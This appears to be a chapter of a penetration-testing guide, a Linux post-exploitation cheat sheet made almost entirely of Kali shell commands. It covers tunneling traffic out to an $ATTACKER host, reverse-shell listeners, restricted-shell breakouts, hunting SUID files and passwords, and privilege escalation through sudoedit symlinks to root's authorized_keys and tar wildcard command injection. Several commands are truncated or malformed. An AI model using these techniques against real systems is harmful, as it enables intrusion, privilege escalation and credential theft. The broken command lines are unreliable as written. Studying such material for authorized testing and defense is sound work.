Skip to content

Chapter 5 - Linux Post-Exploitation

Unplug the network cable and instantiate draconian measures for physical security, You’ll make sure nobody can get in, but you’ll also make sure that nobody actually wants to use the platform. And that may sound like an extreme case, but it’s a very fundamental issue in security. You cannot look at security as something separate. Security issues are ‘just’ normal bugs

_— **_**Linus Torvald

This is the phase I like to refer to as second pass enumeration or enumeration from the inside. Now that we've gained a foothold into the network it is crucial to run all of our enumeration from the ground up as an inside actor.


The Linux Programming Interface


kernel-exploits - GitHub

Linux Kernel Exploits - GitHub

Basic Linux Privilege Escalation - g0tm1lk

UNIX PrivEsc Check


Linux PrivEsc for fun and profit and all around mischief

A PenTester's Guide to Pivoting

Understanding systemd

Listing Packages
Kali> dpkg -l
Kali> rpm -qa
Uploading Files
Kali> wget
Kali> curl
Kali> scp ~/ user@$TARGET:tmp/
Port Redirection

vi /etc/rinetd.conf
# bind        # port        # connect        # port
a.b.c.d     53             e.f.g.h         80
Generate key
Kali> ssh-keygen -t rsa
SSH with Key
Kali> ssh -i key_file user@host
SSH Tunneling
# Local Tunnel
Kali> ssh $ATTACKER -L 3000:$TARGET:2222

# Remote Tunnel
Kali> ssh $TARGET -R 2222:localhost:3000

# Dynamic Tunnel to $TARGET
Kali> ssh -D -N username@$TARGET
tgcd tunneling
Kali> tgcd -L -p 9999 -q 40000
Kali> tgcd -C -s IP:9999 -c ATTACKER:40000
Kali> iptables -t nat -A OUTPUT -d IP -j DNAT --to-destination
HTTP Tunneling
Kali> nc -vvn $TARGET 8888
# create reverse ssh tunnel on our target
Kali> ssh -f -N -R 2222: root@$ATTACKER

# create on our attacking machine
Kali> ssh -f -N -D -p 2222

# Good to go
Kali> proxychains nmap -sV $TARGET
# Set IP

Kali> ifconfig eth0

# Calculate subnet

Kali> ipcalc

# Bring devices up/down

Kali> ifconfig eth0 up
Kali> ifconfig eth0 down

# Get IP from DHCP

Kali> dhclient

# Log traffic for ICMP packets

Kali> tcpdump -i tun0 icmp

# Test from remote box

Kali> ping $ATTACKER -c 3
Listen for Shell

Reverse Shell Cheat Sheet

Kali> nc -vlnp 54321
Kali> socat file:`tty`,echo=0,raw udp-listen:54321
Start a simple HTTP server
Kali> python -m SimpleHTTPServer 80
Kali> python3 -m http.server
Kali> ruby -r webrick -e " => 80, :DocumentRoot => Dir.pwd).start"
Kali> php -S
Bash Foo
function bin2sc {
    hexdump -v -e '"\\""x" 1/1 "%02x" ""'${1}
Scan for string in all files in a directory
Kali> du . | awk '{print $2}'| grep -rnw "string" --color
Convert file contents to lowercase
Kali> tr '[:upper:]' '[:lower:]'< inputfile
Simple for loop
Kali> for i in`seq 10 20`;do this;done
Remove last byte from a file
Kali> truncate -s -1 filename
Hijack full path to a binary for current pts
Kali> function/usr/bin/foo () { /usr/bin/echo "It works"; }
Kali> export -f /usr/bin/foo
Use Env to force scripts to run a different command
Kali> ln -s /usr/bin/nano cat
Kali> export PATH=.:$PATH
Port Knocking
Kali> for x in port1 port2 port3;do nmap -Pn --host_timeout 201 --max-retries -p $x $TARGET;done
Kali> nc -z $TARGET port1 port2 port3;
Breakout Shell

Escape from Shellcatraz: Breaking out of restricted UNIX shells

Kali> awk ‘BEGIN {system(“/bin/bash”)}’
Kali> python -c ‘import pty; pty.spawn(“/bin/bash”)’
Kali> echo os.system(‘/bin/bash’);
Kali> /bin/sh -i
Upgrade Shell
# Background current shell: CTRL + Z

Kali> stty raw -echo
Kali> fg

Upgrading Simple shells to fully interactive TTYs

Insecure Sudo
Kali> sudo -l
Finding gems on the file system
# Find commands for SUID or SGID
Kali> find / -perm -g=s -type f 2>/dev/null
Kali> find / -perm -u=s -type f 2>/dev/null

# Find commands for writable/executable directories
Kali> find / -writable -type d 2>/dev/null
Kali> find / -perm -o w -type d 2>/dev/null
Kali> find / -perm -o x -type d 2>/dev/null

# Sometimes a quick bit of information can be helpful
# Especially if you get access denied when you try to run a command
# Such as iptables -L
Kali> locate iptables

# Locate useful files like gcc, wget, etc
Kali> locate gcc

# Take advantage of wildcard searching
# This is only a base example of what you can do
# I use this technique often to find random things hidden deep in the file system
Kali> ls /*/*/*/*.conf

# Be creative
Kali> cat /etc/cron.*/* | grep SEARCHSTRING

# Mix it up
Kali> find / -type f -name '*.conf' | xargs grep -rnw -3 "Password" 2>/dev/null
Unmounted drives
Kali> cat /etc/fstab
Kali> mount
Kali> exim -bV -v | grep -i Perl
Wildcard Manipulation

UNIX Wildcards gone wild

# if sudoedit is using wildcards you can escape out with a few techniques
# Such as:  (root) NOPASSWD: sudoedit /var/www/*/*/file.html
Kali> ln -s /root/.ssh/authorized_keys /var/www/testing/testdir/file.html
# Now when you add your key to this file, you will be able to login to root, for example
# If there is a script running as an authorized user that uses wildcards to tar a folder, you can inject command line arguments via:
Kali> echo '' > "--checkpoint-action=exec='sh'"
Kali> echo '' > "--checkpoint=1"